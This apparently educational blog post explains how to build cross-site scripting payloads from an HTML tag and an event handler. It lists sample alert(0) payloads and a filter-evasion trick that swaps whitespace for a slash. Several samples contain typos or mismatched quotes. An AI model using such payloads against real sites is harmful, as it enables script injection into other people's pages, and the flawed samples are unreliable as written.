As we always use some Common payloads while trying to get XSS on the web app. But there is an techniques which can be used to create your own XSS payloads. We can build up different payloads using the general payload
<htmltag event-handler=javascript-code-to-be-executed>
For Example:
<b onmouserover='alert(0)'>
where The <b> is an HTML Tag
onmouserover is an Event handler
and alert(0) is an javascript to be executed.
Remember While creating Your Own Payloads white spaces can be replaced with / like
<svg onload=alert(0)> can be written as
<svg/onload=alert(0)
Some Payloads needs User interaction:
<svg onclick='alert(0)">
Some payloads needs something before it:
<frameset><frame src onload='alert(0)'>
Further advance XSS Payloads can be generated using WebGun - XSS Payload generator Designed by Brute Logic.
#Hack2learn
Comments
Post a Comment